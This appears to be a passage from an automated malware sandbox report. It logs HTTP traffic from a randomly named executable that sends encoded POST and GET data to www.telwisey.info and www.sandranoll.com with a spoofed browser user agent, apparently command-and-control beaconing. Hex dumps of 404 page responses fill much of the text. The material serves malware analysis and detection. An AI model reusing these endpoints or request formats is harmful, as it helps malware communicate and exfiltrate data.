                Aug 19, 2024 04:28:53.995600939 CEST1236INData Raw: 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 33 31 30 2e 31 39 34 22 20 79 31 3d 22 31 34 33 2e 33 34 39 22
                Data Ascii: necap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="rou
                Aug 19, 2024 04:28:53.995634079 CEST1236INData Raw: 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b
                Data Ascii: 4" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g> <g>
                Aug 19, 2024 04:28:53.995666981 CEST1236INData Raw: 20 79 31 3d 22 34 30 36 2e 39 36 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74
                Data Ascii: y1="406.967" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x2="182.44" y2="411.146" />
                Aug 19, 2024 04:28:53.995719910 CEST1236INData Raw: 2e 37 35 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69
                Data Ascii: .753" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E06
                Aug 19, 2024 04:28:53.995752096 CEST1236INData Raw: 37 36 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 33 38 32 2e 35 31 35 22 20 63 79 3d 22 35 33 30 2e 39 32 33 22 20
                Data Ascii: 76" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.
                Aug 19, 2024 04:28:53.995785952 CEST1236INData Raw: 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e
                Data Ascii: "#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620"
                Aug 19, 2024 04:28:54.000701904 CEST1236INData Raw: 69 64 3d 22 61 72 6d 4c 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22
                Data Ascii: id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" d="M301.301,347.66c-1.702,0.242-5.91,1.627-7.492,2.536l-47.965,27.3


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                23192.168.2.461897199.192.19.19804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:28:55.918767929 CEST10871OUTPOST /ei85/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.telwisey.info
                Origin: http://www.telwisey.info
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.telwisey.info/ei85/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 55 4a 30 37 76 2f 37 79 73 79 66 58 56 46 49 30 69 47 59 4a 78 61 43 45 71 52 30 5a 4a 53 37 4e 68 70 61 78 53 77 46 74 35 4d 74 43 70 4f 55 51 7a 6a 76 42 53 6a 6a 31 73 70 4d 6b 51 71 59 68 31 31 70 32 2b 4d 49 4f 6c 70 78 32 36 4d 49 38 52 4b 68 59 42 2b 4f 4b 53 4e 33 52 6a 71 66 2b 44 35 4d 69 2f 57 6c 32 46 6c 6e 6f 30 37 75 68 57 6c 35 72 52 79 69 74 54 37 67 6e 74 78 77 36 63 4d 6a 4a 54 30 37 71 35 72 5a 4d 30 2b 4f 6a 59 2f 32 58 53 63 38 47 4d 76 78 6a 6a 45 4c 6a 50 39 77 6b 32 6f 4a 57 56 4e 53 30 68 44 50 38 67 32 78 79 55 2b 76 74 74 30 74 70 53 50 71 7a 6c 44 68 36 6a 4d 4e 6e 35 55 47 4b 46 61 67 36 47 6b 5a 6d 35 57 52 72 78 72 64 41 6b 68 43 70 64 73 43 71 36 6e 58 4f 32 61 78 65 71 71 78 73 71 59 44 4f 79 78 45 6a 2b 61 37 62 75 51 35 6e 77 4a 31 65 6f 48 73 4c 59 51 62 32 31 30 2f 75 7a 6e 66 57 57 44 33 44 6f 66 51 4c 65 55 2f 63 38 73 77 51 44 [TRUNCATED]
                Data Ascii: lH=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdUJ07v/7ysyfXVFI0iGYJxaCEqR0ZJS7NhpaxSwFt5MtCpOUQzjvBSjj1spMkQqYh11p2+MIOlpx26MI8RKhYB+OKSN3Rjqf+D5Mi/Wl2Flno07uhWl5rRyitT7gntxw6cMjJT07q5rZM0+OjY/2XSc8GMvxjjELjP9wk2oJWVNS0hDP8g2xyU+vtt0tpSPqzlDh6jMNn5UGKFag6GkZm5WRrxrdAkhCpdsCq6nXO2axeqqxsqYDOyxEj+a7buQ5nwJ1eoHsLYQb210/uznfWWD3DofQLeU/c8swQDQLMEHJPu8Oh9b3dVoL2iAc6qieDbFEMFpX/ZJ+HkqLtOHhiekgZsen4K+RIN6Pjr2+R0+dgEMjuyz+lAQY9Hxc95lAZhBLRw9TzSyy76CIvmeGl475JnpFhKg9pV48amtjJySGPr4BSFZxEvzEasOX6z8fdkJRXBgxweOu1pNj/sxb5vIU2uLF9AJJ6QSbjhlfC7ShdnfDp3mhd82PvuZm08IEJPS6EeihzjeGabvPmZgkG++LObAkDusr9oJswpqRKQHxOhHuUEIsOhLd9e7Kq+BUNwHTv72QjB1jCXCwEm787RW/04S0MhJtc6GoYykfsd8dC9FxGjygw5Y7VNDFDacN82rcUch34GOOB+H7nV2GD+vnnyA/cMam9LyY9v9ss/xoYbsxjjB/awRli6yx5y9nJ11vpDWB8dm2WqCczKAV0r/YuHPSlsUTriFl/eREK8rLOxeIHf8Q6jMiWrJruLqaQwT0z7LYoP6E1ntHpn/xS22MtLWVekCaridGquxvyfg1w863y0dD0aIgkSQ8ARKmIGEf3QkJSYv+YiUI6qTYNnsYAd8LAoIwOxiQwYFUb+WQEsX5fEdqfSVnIYMXntGnXY5aIsmQACpuzE8bJoUOBaI84kmkhwsK8806Art9bDLGFlgmJgZiRGxjXRNA0aQtessm4sRM [TRUNCATED]
                Aug 19, 2024 04:28:56.555280924 CEST1236INHTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:28:56 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                Aug 19, 2024 04:28:56.555306911 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                Aug 19, 2024 04:28:56.555325031 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                Aug 19, 2024 04:28:56.555344105 CEST1236INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                Aug 19, 2024 04:28:56.555372000 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d
                Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
                Aug 19, 2024 04:28:56.555387974 CEST1236INData Raw: 37 31 39 22 20 78 32 3d 22 32 34 30 2e 31 31 33 22 20 79 32 3d 22 35 35 31 2e 37 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20
                Data Ascii: 719" x2="240.113" y2="551.719" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="186.359" y1="406.967" x2="1
                Aug 19, 2024 04:28:56.555406094 CEST1236INData Raw: 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 34 35 30 2e 30 36 36 22 20 63 79 3d 22 33 32 30 2e 32 35 39 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20
                Data Ascii: rlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="168.303" cy="353.753" r="7.952" />
                Aug 19, 2024 04:28:56.555419922 CEST108INData Raw: 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20
                Data Ascii: .651" /> <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle
                Aug 19, 2024 04:28:56.555435896 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                Aug 19, 2024 04:28:56.555453062 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=
                Aug 19, 2024 04:28:56.560779095 CEST1236INData Raw: 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34 36 0a 09 09 09 09 43 33 37 35 2e 36 32 35 2c 34 33 37 2e 33 35 35 2c 33 38 33 2e 30 38 37 2c 34 33 37 2e 39 37 33 2c 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 7a 22 20 2f 3e 0a 20 20
                Data Ascii: 817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="roun


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                24192.168.2.461898199.192.19.19804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:28:58.451304913 CEST506OUTGET /ei85/?lH=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.telwisey.info
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:28:59.083702087 CEST1236INHTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:28:58 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                Aug 19, 2024 04:28:59.083745003 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37
                Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.
                Aug 19, 2024 04:28:59.083781004 CEST1236INData Raw: 34 36 31 2c 34 2e 36 36 38 2c 32 2e 37 30 35 2c 37 2e 34 38 38 4c 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                Data Ascii: 461,4.668,2.705,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet">
                Aug 19, 2024 04:28:59.083815098 CEST1236INData Raw: 63 33 36 2e 30 36 39 2c 30 2c 36 38 2e 39 37 38 2d 31 2e 31 39 2c 39 33 2e 39 32 32 2d 33 2e 31 34 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 73 74 61 72 73 22 3e
                Data Ascii: c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterli
                Aug 19, 2024 04:28:59.083848000 CEST1236INData Raw: 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 33 31 30 2e 31 39
                Data Ascii: h="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stro
                Aug 19, 2024 04:28:59.083880901 CEST672INData Raw: 35 35 35 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d
                Data Ascii: 555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g>
                Aug 19, 2024 04:28:59.083914042 CEST1236INData Raw: 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b
                Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="
                Aug 19, 2024 04:28:59.083949089 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20
                Data Ascii: > </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.9
                Aug 19, 2024 04:28:59.083981037 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20
                Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" />
                Aug 19, 2024 04:28:59.084016085 CEST1236INData Raw: 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                Data Ascii: <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <
                Aug 19, 2024 04:28:59.088929892 CEST1236INData Raw: 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20
                Data Ascii: l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" str


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                25192.168.2.461899213.145.228.16804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:29:04.244107962 CEST772OUTPOST /aroo/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.sandranoll.com
                Origin: http://www.sandranoll.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.sandranoll.com/aroo/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
